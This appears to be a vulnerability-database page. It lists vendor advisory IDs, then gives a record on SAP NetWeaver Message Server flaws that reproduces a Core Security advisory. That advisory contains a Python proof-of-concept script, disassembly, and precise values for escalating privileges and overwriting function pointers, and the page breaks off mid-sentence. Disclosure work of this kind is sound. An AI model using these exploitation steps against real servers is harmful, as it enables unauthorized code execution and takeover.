cisco-sa-iosxe-dhcpsn-dos-xbn8mtks Cisco IOS XE Software DHCP Snooping Denial of Service Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-ios-http-privesc-wcrd5e3 Cisco IOS Software Industrial Ethernet Switch Device Manager Privilege Escalation Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-ewlc-user-del-hqxmpudj Cisco IOS XE Wireless Controller Software Unauthorized User Deletion Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-ewlc-cdp-dos-fpeks9k Cisco IOS XE Wireless Controller Software Cisco Discovery Protocol Denial of Service Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-catc-insec-acc-mtt8eheb Cisco Catalyst Center Insufficient Access Control Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-catalyst-tls-pqnd5kej Cisco Catalyst SD-WAN Manager Certificate Validation Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-c2960-3560-sboot-ztqadrhq Cisco IOS Software for Cisco Catalyst 2960X, 2960XR, 2960CX, and 3560CX Series Switches Secure Boot Bypass Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-bootstrap-kfgxygdh Cisco IOS XE Software Bootstrap Arbitrary File Write Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-asr903-rsp3-arp-dos-wmfzdvjz Cisco IOS XE Software for Cisco ASR 903 Aggregation Services Routers ARP Denial of Service Vulnerability 2025-05-07T16:00:00+00:00 2025-05-07T16:00:00+00:00
cisco-sa-webex-app-client-rce-ufymmylc Cisco Webex App Client-Side Remote Code Execution Vulnerability 2025-04-16T16:00:00+00:00 2025-04-16T16:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
SCA-2023-0004 Vulnerabilities in SICK FTMg 2023-05-11T13:00:00.000Z 2023-05-11T13:00:00.000Z
sca-2023-0003 Vulnerability in SICK Flexi Soft and Flexi Classic Gateways 2023-05-03T13:00:00.000Z 2023-05-03T13:00:00.000Z
SCA-2023-0003 Vulnerability in SICK Flexi Soft and Flexi Classic Gateways 2023-05-03T13:00:00.000Z 2023-05-03T13:00:00.000Z
sca-2023-0002 Use of Telnet in multiple SICK Flexi Soft and Flexi Classic Gateways 2023-04-11T10:00:00.000Z 2023-04-11T10:00:00.000Z
sca-2023-0001 Bootloader mode vulnerability in Flexi Soft Gateways v3 2023-02-20T14:00:00.000Z 2023-02-20T14:00:00.000Z
sca-2022-0015 Use of a Broken or Risky Cryptographic Algorithm in SICK RFU6xx RADIO FREQUEN. SENSOR 2022-12-08T16:00:00.000Z 2022-12-08T16:00:00.000Z
sca-2022-0013 Password recovery vulnerability affects multiple SICK SIMs 2022-10-21T13:00:00.000Z 2022-11-04T14:00:00.000Z
sca-2022-0014 SICK FlexiCompact affected by Denial of Service vulnerability 2022-10-31T11:00:00.000Z 2022-10-31T11:00:00.000Z
sca-2022-0012 OpenSSL vulnerability affects multiple SICK SIMs 2022-08-08T13:00:00.000Z 2022-08-03T13:00:00.000Z
sca-2022-0010 Vulnerability in SICK Flexi Soft Designer & Safety Designer 2022-05-16T10:00:00.000Z 2022-07-19T10:00:00.000Z
sca-2022-0011 Vulnerabilities in SICK Package Analytics 2022-06-08T15:00:00.000Z 2022-06-08T15:00:00.000Z
sca-2022-0009 Vulnerability in SICK Flexi Soft PROFINET IO Gateway FX0-GPNT and SICK microScan3 PROFINET 2022-04-29T15:00:00.000Z 2022-04-29T15:00:00.000Z
sca-2022-0008 Vulnerability in SICK Gateways for Flexi Soft, Flexi Compact, SICK EFI Gateway UE4740, SICK microScan3 and outdoorScan3 2022-04-29T15:00:00.000Z 2022-04-29T15:00:00.000Z
sca-2022-0007 Vulnerabilities in SICK MARSIC300 2022-04-21T15:00:00.000Z 2022-04-21T15:00:00.000Z
sca-2022-0006 Vulnerability in SICK MSC800 2022-04-11T15:00:00.000Z 2022-04-11T15:00:00.000Z
sca-2022-0005 Vulnerability in SICK Overall Equipment Effectiveness (OEE) 2022-04-11T15:00:00.000Z 2022-04-11T15:00:00.000Z
sca-2022-0004 Microsoft vulnerability affects multiple SICK IPCs with SICK MEAC 2022-04-11T15:00:00.000Z 2022-03-31T15:00:00.000Z
sca-2022-0003 Vulnerabilities in SICK FTMg 2022-03-31T15:00:00.000Z 2022-03-31T15:00:00.000Z
sca-2022-0002 PwnKit vulnerability affects multiple SICK IPCs 2022-02-23T16:00:00.000Z 2022-02-23T16:00:00.000Z
sca-2022-0001 Vulnerability in SICK FieldEcho 2022-02-17T16:00:00.000Z 2022-02-17T16:00:00.000Z
sca-2021-0003 SICK Security Advisory for Apache Log4j (CVE-2021-44228) 2021-12-14T17:00:00.000Z 2021-12-17T12:00:00.000Z
sca-2021-0004 Vulnerabilities in SICK SOPAS ET 2021-12-16T08:00:00.000Z 2021-12-17T08:00:00.000Z
sca-2021-0002 MEAC affected by Windows SMBv1 vulnerability 2021-08-04T10:00:00.000Z 2021-08-04T10:00:00.000Z
sca-2021-0001 Inadequate SSH configuration in SICK Visionary-S CX 2021-06-25T10:00:00.000Z 2021-06-25T10:00:00.000Z
sca-2020-0005 Package Analytics affected by Windows TCP/IP vulnerability 2020-10-29T11:00:00.000Z 2020-10-29T11:00:00.000Z
sca-2020-0004 Vulnerability in Platform Mechanism AutoIP 2020-08-31T10:00:00.000Z 2020-08-31T10:00:00.000Z
sca-2020-0003 MEAC affected by Windows SMBv3 vulnerability 2020-08-07T10:00:00.000Z 2020-08-07T10:00:00.000Z
sca-2020-0002 Vulnerabilities in SICK Package Analytics 2020-08-07T10:00:00.000Z 2020-07-28T10:00:00.000Z
sca-2020-0001 Security Information Regarding "Profile Programming" 2020-05-31T10:00:00.000Z 2020-05-31T10:00:00.000Z
sca-2019-0002 Vulnerability in SICK FX0-GENT00000 and SICK FX0-GPNT00000 2019-09-20T10:00:00.000Z 2019-09-20T10:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
nn-2023:11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2023:10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2023:1-01 Authenticated SQL Injection on Alerts in Guardian/CMC before 22.5.2 2023-05-03T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2022_2-02 Authenticated RCE on project configuration import in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2022_2-01 Authenticated RCE on logo report upload in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2022:2-02 Authenticated RCE on project configuration import in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2022:2-01 Authenticated RCE on logo report upload in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2021_2-01 Authenticated command path traversal on timezone settings in Guardian/CMC before 20.0.7.4 2021-02-22T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2021_1-01 Authenticated command injection when changing date settings or hostname in Guardian/CMC before 20.0.7.4 2021-02-22T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2021:2-01 Authenticated command path traversal on timezone settings in Guardian/CMC before 20.0.7.4 2021-02-22T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2021:1-01 Authenticated command injection when changing date settings or hostname in Guardian/CMC before 20.0.7.4 2021-02-22T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2020_3-01 Angular template injection on custom report name field 2020-05-26T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2020_2-01 Cross-site request forgery attack on change password form 2020-05-26T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2020:3-01 Angular template injection on custom report name field 2020-05-26T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2020:2-01 Cross-site request forgery attack on change password form 2020-05-26T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2019_2-01 CSV Injection on node label 2019-11-11T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2019_1-01 Stored XSS in field name data model 2019-11-11T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2019:2-01 CSV Injection on node label 2019-11-11T11:00:00.000Z 2023-11-16T11:00:00.000Z
nn-2019:1-01 Stored XSS in field name data model 2019-11-11T11:00:00.000Z 2023-11-16T11:00:00.000Z
NN-2023:9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2023-11-16T11:00:00.000Z
NN-2023:8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2023-11-16T11:00:00.000Z
NN-2023:7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2023-11-16T11:00:00.000Z
NN-2023:6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2023-11-16T11:00:00.000Z
NN-2023:5-01 Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2023-11-16T11:00:00.000Z
NN-2023:4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2023-11-16T11:00:00.000Z
NN-2023:3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2023-11-16T11:00:00.000Z
NN-2023:2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2023-11-16T11:00:00.000Z
NN-2023:11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2023-11-16T11:00:00.000Z
NN-2023:10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2023-11-16T11:00:00.000Z
NN-2023:1-01 Authenticated SQL Injection on Alerts in Guardian/CMC before 22.5.2 2023-05-03T11:00:00.000Z 2023-11-16T11:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
msrc_cve-2025-49721 Windows Fast FAT File System Driver Elevation of Privilege Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49716 Windows Netlogon Denial of Service Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49714 Visual Studio Code Python Extension Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49711 Microsoft Excel Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49706 Microsoft SharePoint Server Spoofing Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49705 Microsoft PowerPoint Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49704 Microsoft SharePoint Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49703 Microsoft Word Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49702 Microsoft Office Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49701 Microsoft SharePoint Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49700 Microsoft Word Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49699 Microsoft Office Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49698 Microsoft Word Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49697 Microsoft Office Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49696 Microsoft Office Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49695 Microsoft Office Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49694 Microsoft Brokering File System Elevation of Privilege Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49693 Microsoft Brokering File System Elevation of Privilege Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49691 Windows Miracast Wireless Display Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49690 Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49688 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49687 Windows Input Method Editor (IME) Elevation of Privilege Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49686 Windows TCP/IP Driver Elevation of Privilege Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49685 Windows Search Service Elevation of Privilege Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49684 Windows Storage Port Driver Information Disclosure Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49683 Microsoft Virtual Hard Disk Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49682 Windows Media Elevation of Privilege Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49681 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49680 Windows Performance Recorder (WPR) Denial of Service Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
msrc_cve-2025-49679 Windows Shell Elevation of Privilege Vulnerability 2025-07-08T07:00:00.000Z 2025-07-08T07:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-202001-0832 A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. The vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. *Advisory Information* Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note 1800603 [2] regarding these issues. 7. *Credits* Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '*39 server_name = '-'+' '*39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax*8] lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. *Gaining remote code execution by overwriting function pointers* Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to 